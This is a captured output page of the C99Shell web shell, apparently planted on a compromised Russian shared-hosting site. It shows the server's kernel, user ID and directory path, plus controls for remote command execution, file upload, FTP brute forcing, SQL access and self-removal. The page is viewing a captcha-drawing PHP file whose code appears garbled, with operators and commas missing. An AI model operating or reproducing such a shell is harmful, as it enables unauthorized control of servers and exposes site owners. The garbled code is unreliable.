!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache/2.4.68 (Linux) PHP/7.4.33. PHP/7.4.33 

uname -a: Linux bjb2293782.nichost.ru 6.6.151-1.el8.x86_64 #1 SMP PREEMPT_DYNAMIC Mon Aug 10
11:16:02 MSK 2026 x86_64
 

uid=12584(bjb2293782) gid=12584(bjb2293782) groups=12584(bjb2293782)  

Safe-mode: OFF (not secure)

/home/bjb2293782/xn--80abaeoqbbrbgf8aea5a2a2z.xn--p1ai/docs/   drwxr-x---
Free 2664.78 GB of 4607.12 GB (57.84%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     digits.php (788 B)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

session_start
();
if (!isset(
$_SESSION['protectCode'])) die('no session');
$code $_SESSION['protectCode'];
$code "$code";


$image imagecreatetruecolor(80,30);

$color imagecolorallocate($image0x330x330x33);
imagefilledrectangle($image008030$color);

for(
$i=0$i 20;$i++)
{
    
$color imagecolorallocate($image0x77+rand(-30,30), 0x77+rand(-30,30), 0x77+rand(-30,30));
    
imageline($image,0,rand(0,30),80,rand(0,30),$color);
}



$L strlen($code);
$x 10;
for(
$i=0$i<$L$i++, $x+=15)
{
    
$c $code{$i};

    
$color imagecolorallocate($image0xcc+rand(-40,40), 0xcc+rand(-40,40), 0xcc+rand(-40,40));
    
imagestring($image5$x rand(-5,5), rand(2,14), $c$color);
}

header("Content-Type: image/gif");
imagegif($image);
imagedestroy($image);

?>
    
    

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0038 ]--